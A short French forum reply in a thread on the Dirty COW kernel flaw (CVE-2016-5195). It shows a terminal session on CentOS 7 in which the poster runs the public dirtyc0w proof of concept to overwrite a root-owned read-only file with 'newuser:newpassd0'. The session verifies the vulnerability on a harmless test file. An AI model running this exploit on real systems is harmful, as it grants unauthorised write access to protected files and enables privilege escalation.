• [^] # Re: Exploitable sur CentOS 7

    Posté par (site web personnel) . En réponse au journal CVE-2016-5195 Dirty COW. Évalué à 7. Dernière modification le 22 octobre 2016 à 15:08.

    Mais je n'avais plus les droits d'écriture sur le fichier.

    Ceci dit, si ça lève un doute, je recommence sur un fichier appartenant à root :

    [xate@xate-test ~]$ echo "test bis de dirtycow" > /tmp/plop2
    [xate@xate-test ~]$ chmod 0404 /tmp/plop2
    [xate@xate-test ~]$ sudo chown root:root /tmp/plop2
    [xate@xate-test ~]$ cat /tmp/plop2
    test bis de dirtycow
    [xate@xate-test ~]$ ls -ltrh /tmp/plop2
    -r-----r--. 1 root root 21 22 oct. 18:27 /tmp/plop2
    [xate@xate-test ~]$ ./dirtyc0w /tmp/plop2 newuser:newpassd0
    mmap 7f1f28cfc000
    [xate@xate-test ~]$ ls -ltrh
    -r-----r--. 1 root root 21 22 oct. 18:27 /tmp/plop2
    [xate@xate-test ~]$ cat /tmp/plop2
    newuser:newpassd0own
    [xate@xate-test ~]$